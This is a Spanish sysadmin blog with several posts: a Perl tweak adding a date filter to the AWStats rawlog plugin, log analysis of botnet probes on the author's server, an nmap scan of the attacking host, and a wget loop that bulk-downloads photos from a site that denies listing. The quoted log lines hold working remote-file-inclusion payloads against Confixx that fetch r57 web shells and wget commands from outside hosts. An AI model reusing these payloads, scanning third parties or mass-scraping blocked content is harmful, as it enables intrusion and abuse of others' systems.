La vieja guardia

Una pequeña modificación escrita en perl que he añadido al rawlog.pm que añade un filtro al Awstats para la visualización por fechas del fichero log en bruto.

Por defecto el plugin rawlog (plugin awstats para ver fichero log en bruto) no filtra por ningun criterio y te deja que selecciones este campo como cadena de búsquda dentro del log. Esto no me gusta en algunos logs pesados que tenia y decidí que buscara siempre por la fecha actual si  no ponias criterio.

Esto me sirve a mi y en determinadas circustancias. Muchos pensarán que para que lo necesitas si tienes rotación diaria de logs, etc.

En mi caso, editamos /usr/share/awstats/plugins/rawlog.pm y añadimos estas lineas:

16 no strict "refs";
17 use POSIX qw/ strftime /;
18
19 # Muestra la fecha como filtro del rawlog
20 my $ab_day=strftime( "%d", localtime(time) );
21 my $ab_month=strftime( "%b", localtime(time) );
22 my $ab_year=strftime( "%Y", localtime(time) );
23 my $datefilter="$ab_day/$ab_month/$ab_year";

Solo hay que buscar ahora la función BuildFullHTMLOutput_rawlog y ya tenemos filtrado el log por el dia actual.

86 sub BuildFullHTMLOutput_rawlog {
87 # <-----
88 my $Filter=$datefilter;
89 if ($QueryString =~ /filterrawlog=([^&]+)/i) { $Filter=&DecodeEncodedString("$1"); }

Si queremos avisar de esto al usuario cuando se muestre el formulario, lo hacemos en _ShowForm poniendo el texto que queramos.

Referencias: http://awstats.sourceforge.net/

Una red de bots o BotNet es un conjunto de ordenadores que ejecutan tareas de forma autonoma y con un objetivo, asi, dicho burdamente.

Recientemente he visto que mi servidor ha sido 'premiado' con un boleto para pertenecer a una red de este tipo. Lastima que no haya sido agraciado ;)

El origen del ataque procede de una ip suiza (quiza un bot controlado) que intenta buscar y ejecutar en mi servidor lo siguiente:

HEAD http://80.3xxx.xxx.xxx
/admin/business_inc/saveserver.php?thisdir=http://seyyar.by.ru/r57.php?\xa6POST\xa6r57shell\xa6\xa6\xa6 HTTP/1.0

El fichero saveserver.php pertenece a un software llamado Confixx que tiene una variable no declarada que no se valida, thisdir :).

Mas información en securityfocus

PandaLabs descubrio Zunker, un software creado para infectar a traves de la selección cuidadosa de vulnerabilidades de la maquina en cuestion y la posterior ejecucion de los correspondientes exploits.

Mas información de zunker, aqui

En este servidor ruso alojan el zunker, cuidado en donde pinchamos. * http://seyyar.by.ru/

Conclusiones:

Parece que las redes de bots se estan extendiendo y los zombies nos intentan morder a toda costa. Tendremos que tomar las medidas preventivas para evitarlo.

Un connect desde 218.160.71.53 intentando usar mi maquina para conectarse a msa-mx11.hinet.net:25 (smtp).

Osea, que yo soy un spammer? ni de coña :D

218.160.71.53 - - [05/Aug/2007:12:30:14 +0200] "CONNECT msa-mx11.hinet.net:25 HTTP/1.0" 403 202 "-" "-"

Lo siguen intentando aunque tengo un 403 Forbidden como una casa.

[]telnet debian 80
Trying 192.168.1.3...
Connected to www.midominio**.com.
Escape character is '^]'.
CONNECT msa-mx11.hinet.net:25 HTTP/1.0

HTTP/1.1 403 Forbidden
Date: Sun, 05 Aug 2007 11:06:06 GMT
Server: Apache (Debian) PHP
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>
Connection closed by foreign host.

:)

Logs del servidor de casa:

213.196.181.xxx - - [04/Aug/2007:20:58:19 +0200] "HEAD http://ip/admin/business_inc/saveserver.php?thisdir=http://9et.org/bh/CMD_2.GIF?&cmd=wget\xa6GET\xa6CMD-MOROCCO\xa6\xa6\xa6 HTTP/1.0" 200 - "http://ip/admin/business_inc/saveserver.php?thisdir=http://9et.org/bh/CMD_2.GIF?&cmd=wget\xa6GET\xa6CMD-MOROCCO\xa6\xa6\xa6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Menudo arsenal tienen estos de batamhacker o quienes sean.

* aqui la web del ataque http://9et.org/bh/

* aqui la web del equipo de hackers http://www.batamhacker.or.id/ que aparece insistentemente en la web desde donde procedia el ataque .

Como suele ocurrir siempre ... victimas directas.
[]nmap -sS -P0 -p1-1024 213.196.181.xxx

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2007-08-05 12:57 CEST
Interesting ports on svr1.nicejob.ch (213.196.181.xxx):
(The 1011 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
90/tcp open dnsix
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
299/tcp filtered unknown
388/tcp open unidata-ldm
445/tcp open microsoft-ds
643/tcp filtered unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 52.847 seconds

Haciendo esto con nmap, mi ruter se inundaba de conexiones dando un "ICMP destination unreachable" que provocaba un pequeño DoS temporal.

** inicio cabreo temporal **
** Gracias al 'sistema' de lacoctelera por haberme jodido el log :'( **
** No se por que elpais ha comprado parte de su sistema **
** fin de cabreo temporal **

Como iba diciendo, el log ya no lo pude rescatar, por que simplemente se posteo el borrador vacio de contenido. De nuevo, gracias lacoctelera, por esto y por pedirme el login 1500 millones de veces cada vez que escribo. Eso es velar por mi seguridad, si señor (que coñazo) :D

Volviendo al tema del post original, esto pasaba por tener mal configurado el ip_forwarding en /etc/network/options, tenia que habilitarlo y ya.

si accedes a http://static1.bareka.com/photos/medium/ ... un xml nos dice:

<Error>

<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>** cifrado ** </RequestId>

<HostId>
**cifrado **
</HostId>

</Error>

pero no es asi por shell :~~

LIMIT = 3000000
for ((i=1; i <= LIMIT ; i++)) ; do wget http://static1.bareka.com/photos/medium/$i.jpg; done

No se que sentido tiene bajarse 3 millones de fotos, pero ...
Desconozco el numero de servidores y numero posible de fotos.